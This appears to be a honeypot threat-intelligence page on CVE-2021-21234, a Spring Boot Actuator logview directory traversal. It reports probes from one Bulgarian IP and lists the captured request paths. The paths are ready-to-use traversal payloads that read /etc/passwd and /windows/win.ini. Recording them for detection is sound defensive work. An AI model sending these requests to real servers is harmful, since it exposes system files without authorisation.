CVE-2021-21234: Spring Boot Actuator Logview Directory Traversal

HoneyLabs honeypots recorded 4 probes matching CVE-2021-21234 from 1 distinct source IP addresses in the last 7 days. Severity is rated high.

Request paths that identify it

  • /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../..
  • /log/view?filename=/windows/win.ini&base=../../../../../../../../../..
  • /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../..
  • /log/view?filename=/etc/passwd&base=../../../../../../../../../..

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2144Techoff Srv LimitedBulgaria

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited41

Captured requests

  • /log/view?filename=/windows/win.ini&base=../../../../../../../../../../
  • /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../
  • /log/view?filename=/etc/passwd&base=../../../../../../../../../../
  • /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../

CVE report

CVE report

Open a specific CVE from the CVE tracker.